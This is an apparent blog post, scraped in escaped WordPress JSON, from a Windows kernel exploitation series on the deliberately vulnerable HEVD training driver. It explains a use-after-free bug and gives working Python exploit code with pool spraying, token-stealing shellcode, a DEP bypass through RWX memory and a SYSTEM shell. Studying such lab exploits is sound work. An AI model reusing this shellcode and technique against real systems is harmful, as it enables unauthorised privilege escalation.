Strategy:<\/h2>\n\n\n\n
The strategy for this blogpost will be as follows:<\/p>\n\n\n\n
Initial Phase:<\/p>\n\n\n\n
- \n
- Source Code Review<\/li>\n\n\n\n
- Finding IOCTLs<\/li>\n\n\n\n
- Verifying the vulnerability with the scripts<\/li>\n<\/ul>\n\n\n\n
Source Code Review<\/h2>\n\n\n\n
As always we’ll check the C code first to understand where the vulnerability lies: <\/p>\n\n\n\n
The structure of the code is the same, defines some variables and datatypes, shows the vulnerable vs secure code and triggers the vulnerability, then defines IOCTL code. <\/p>\n\n\n\n
- \n
- AllocateUaFObject<\/li>\n\n\n\n
- UseUaFObject<\/li>\n\n\n\n
- FreeUaFObject<\/li>\n\n\n\n
- AllocateFakeObject<\/li>\n<\/ol>\n\n\n\n
Function1: AllocateUaFObject<\/h3>\n\n\n\n
This funcion:<\/p>\n\n\n\n
allocates a Non-Paged pool chunk: <\/p>\n\n\n\n
- \n
- UseAfterFree = (PUSE_AFTER_FREE)ExAllocatePoolWithTag(NonPagedPool, sizeof(USE_AFTER_FREE), (ULONG)POOL_TAG);<\/li>\n\n\n\n
- uses the Windows API call: ExAllocatePoolWithTag<\/li>\n<\/ul>\n\n\n\n
fills it withA character: <\/p>\n\n\n\n
- \n
- RtlFillMemory((PVOID)UseAfterFree->Buffer, sizeof(UseAfterFree->Buffer), 0x41);<\/li>\n\n\n\n
- uses the Windows API call: RtlFillMemory <\/li>\n<\/ul>\n\n\n\n
terminates with a NULL character:<\/p>\n\n\n\n
- \n
- UseAfterFree->Buffer[sizeof(UseAfterFree->Buffer) – 1] = ‘\\0’;<\/li>\n<\/ul>\n\n\n\n
![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/11\/image-795x1024.png\")
<\/figure>\n\n\n\nFunction 2: UseUaFObject<\/h3>\n\n\n\n
In this function:<\/p>\n\n\n\n
- \n
- if the pointer g_UseAfterFreeObject exists, it calls the callback<\/li>\n\n\n\n
- This shows the danger of using the dangling pointer which we will use in our exploit<\/li>\n<\/ul>\n\n\n\n
![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/11\/image-1-1024x665.png\")
<\/figure>\n\n\n\nFunction 3: FreeUaFObject<\/h3>\n\n\n\n
With this funcion, we see the vulnerable and secure implementations:<\/p>\n\n\n\n
- \n
- in the secure version, g_UseAfterFreeObject<\/em> is being set to NULL<\/li>\n\n\n\n
- in the vulnerable version, ExFreePoolWithTag is used, which will leave a reference to a stale dangling pointer. <\/li>\n<\/ul>\n\n\n\n
![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/11\/image-3-1024x937.png\")
<\/figure>\n\n\n\nFunction 4: AllocateFakeObject<\/h3>\n\n\n\n
this is the function we will use to place our shellcode into the non-paged pool<\/p>\n\n\n\n
![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/11\/image-2-923x1024.png\")
<\/figure>\n\n\n\nFinding IOCTL<\/h2>\n\n\n\n
We’ll find 4 different IOCTL for each function found as below:<\/p>\n\n\n\n
- \n
- ALLOCATE_UAF_OBJECT: 0x222013<\/li>\n\n\n\n
- USE_UAF_OBJECT: 0x222017<\/li>\n\n\n\n
- FREE_UAF_OBJECT : 0x22201B<\/li>\n\n\n\n
- ALLOCATE_FAKE_OBJECT.: 0x22201F<\/li>\n<\/ul>\n\n\n\n
Extra Technique: check the Common.h file<\/p>\n\n\n\n
## #define HACKSYS_EVD_IOCTL_xxxx CTL_CODE(FILE_DEVICE_UNKNOWN, 0xxxx, METHOD_NEITHER, FILE_ANY_ACCESS)<\/p>\n\n\n\n
hex((0x00000022 << 16) | (0x00000000 << 14) | (0x802 << 2) | 0x00000003)<\/p>\n\n\n\n
Exploit: Initial Script<\/h2>\n\n\n\n
import struct, sys, ctypes
from ctypes import *
from ctypes.wintypes import *
from subprocess import *
## DLL
kernel32 = windll.kernel32
handle = kernel32.CreateFileA(\"\\\\\\\\.\\\\HackSysExtremeVulnerableDriver\", 0xC0000000, 0, None, 0x3, 0, None)
if not handle or handle == -1:
print \"[+] Cannot get device handle..... Try again.\"
sys.exit(0)
buffer = \"\\x41\" * 0x60
kernel32.DeviceIoControl(handle, 0x222013, None, None, None, 0, byref(c_ulong()), None)
kernel32.DeviceIoControl(handle, 0x22201B, None, None, None, 0, byref(c_ulong()), None)
kernel32.DeviceIoControl(handle, 0x22201F, buffer, len(buffer), None, 0, byref(c_ulong()), None)
kernel32.DeviceIoControl(handle, 0x222017, None, None, None, 0, byref(c_ulong()), None)<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nlisten with windbg and send 4 different IOCTL code with this script to validate after putting breakpoint on the IOCTL handlers.<\/p>\n\n\n\n
Exploit: Spraying Objects<\/h2>\n\n\n\n
spray_event1 = spray_event2 = []
for i in xrange(10000): spray_event1.append(ntdll.NtAllocateReserveObject(byref(HANDLE(0)), 0, 1))<\/strong>
<\/strong>
for i in xrange(5000):<\/strong>
spray_event2.append(ntdll.NtAllocateReserveObject(byref(HANDLE(0)), 0, 1))<\/strong><\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nExploit: Create Holes <\/h2>\n\n\n\n
for i in xrange(0, len(spray_event2), 2):<\/strong>
kernel32.CloseHandle(spray_event2[i])<\/strong><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nExploit: Call the IOCTL code in the correct order:<\/h2>\n\n\n\n
Call the IOCTL code in the correct order
ALLOCATE_UAF_OBJECT -> FREE_UAF_OBJECT -> ALLOCATE_FAKE_OBJECT -> USE_UAF_OBJECT
kernel32.DeviceIoControl(handle, 0x222013, None, None, None, 0, byref(c_ulong()), None)
kernel32.DeviceIoControl(handle, 0x22201B, None, None, None, 0, byref(c_ulong()), None)
fake_obj = ptr_adr + \"\\x41\"*(0x60 - (len(ptr_adr)))
for i in xrange(5000):
kernel32.DeviceIoControl(handle, 0x22201F, fake_obj, len(fake_obj), None, 0, byref(c_ulong()), None)
kernel32.DeviceIoControl(handle, 0x222017, None, None, None, 0, byref(c_ulong()), None)<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\nFinal Exploit<\/h2>\n\n\n\n
We’ll add the shellcode, Defeate DEP, add print statements to debug issues and pop the system shell:<\/p>\n\n\n\n
import struct, sys, ctypes
from ctypes import *
from ctypes.wintypes import *
from subprocess import *
DLL
kernel32 = windll.kernel32
psapi = windll.Psapi
ntdll = windll.ntdll
spraying
spray_event1 = spray_event2 = []
handle
handle = kernel32.CreateFileA(\"\\\\.\\HackSysExtremeVulnerableDriver\", 0xC0000000, 0, None, 0x3, 0, None)
if not handle or handle == -1:
print \"[+] Cannot get device handle\u2026.. Try again.\"
sys.exit(0)
shellcode
shellcode = bytearray(
\"\\x90\\x90\\x90\\x90\" # NOP Sled
\"\\x60\" # pushad
\"\\x64\\xA1\\x24\\x01\\x00\\x00\" # mov eax, fs:[KTHREAD_OFFSET]
\"\\x8B\\x40\\x50\" # mov eax, [eax + EPROCESS_OFFSET]
\"\\x89\\xC1\" # mov ecx, eax (Current _EPROCESS structure)
\"\\x8B\\x98\\xF8\\x00\\x00\\x00\" # mov ebx, [eax + TOKEN_OFFSET]
\"\\xBA\\x04\\x00\\x00\\x00\" # mov edx, 4 (SYSTEM PID)
\"\\x8B\\x80\\xB8\\x00\\x00\\x00\" # mov eax, [eax + FLINK_OFFSET]
\"\\x2D\\xB8\\x00\\x00\\x00\" # sub eax, FLINK_OFFSET
\"\\x39\\x90\\xB4\\x00\\x00\\x00\" # cmp [eax + PID_OFFSET], edx
\"\\x75\\xED\" # jnz
\"\\x8B\\x90\\xF8\\x00\\x00\\x00\" # mov edx, [eax + TOKEN_OFFSET]
\"\\x89\\x91\\xF8\\x00\\x00\\x00\" # mov [ecx + TOKEN_OFFSET], edx
\"\\x61\" # popad
\"\\xC3\" # ret
)
Defeating DEP with VirtualAlloc
Creating RWX memory, and copying our shellcode in that region.
ptr = kernel32.VirtualAlloc(c_int(0), c_int(len(shellcode)), c_int(0x3000), c_int(0x40))
buff = (c_char * len(shellcode)).from_buffer(shellcode)
kernel32.RtlMoveMemory(c_int(ptr), buff, c_int(len(shellcode)))
ptr_adr = hex(struct.unpack('L', ptr))[0])[2:].zfill(8).decode('hex')
spray the objects
for i in xrange(10000):
spray_event1.append(ntdll.NtAllocateReserveObject(byref(HANDLE(0)), 0, 1))
for i in xrange(5000):
spray_event2.append(ntdll.NtAllocateReserveObject(byref(HANDLE(0)), 0, 1))
create holes
for i in xrange(0, len(spray_event2), 2):
kernel32.CloseHandle(spray_event2[i])
Call the IOCTL code in the correct order
ALLOCATE_UAF_OBJECT -> FREE_UAF_OBJECT -> ALLOCATE_FAKE_OBJECT -> USE_UAF_OBJECT
kernel32.DeviceIoControl(handle, 0x222013, None, None, None, 0, byref(c_ulong()), None)
kernel32.DeviceIoControl(handle, 0x22201B, None, None, None, 0, byref(c_ulong()), None)
fake_obj = ptr_adr + \"\\x41\"*(0x60 - (len(ptr_adr)))
for i in xrange(5000):
kernel32.DeviceIoControl(handle, 0x22201F, fake_obj, len(fake_obj), None, 0, byref(c_ulong()), None)
kernel32.DeviceIoControl(handle, 0x222017, None, None, None, 0, byref(c_ulong()), None)
call the shell
print \"\\n[+] system shell incoming\"
Popen(\"start cmd\", shell=True)<\/code><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n![\"\"](\"https:\/\/areyou1or0.it\/wp-content\/uploads\/2022\/11\/Screenshot-2022-11-20-at-18.21.38-1024x417.png\")
<\/figure>\n","protected":false},"excerpt":{"rendered":"As this is the 5th vulnerability on HEVD (Use-After-Free), I’ll give a summary of what we’ve learned so far: Strategy: The strategy for this blogpost will be as follows: Initial Phase: Source Code Review As always we’ll check the C code first to understand where the vulnerability lies: The structure of the code is the… Continue reading HEVD Windows Kernel Exploitation 6: Use-After-Free<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[21],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/325"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=325"}],"version-history":[{"count":2,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/325\/revisions"}],"predecessor-version":[{"id":332,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/325\/revisions\/332"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=325"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=325"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=325"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
- in the vulnerable version, ExFreePoolWithTag is used, which will leave a reference to a stale dangling pointer. <\/li>\n<\/ul>\n\n\n\n
- in the secure version, g_UseAfterFreeObject<\/em> is being set to NULL<\/li>\n\n\n\n
- UseAfterFree->Buffer[sizeof(UseAfterFree->Buffer) – 1] = ‘\\0’;<\/li>\n<\/ul>\n\n\n\n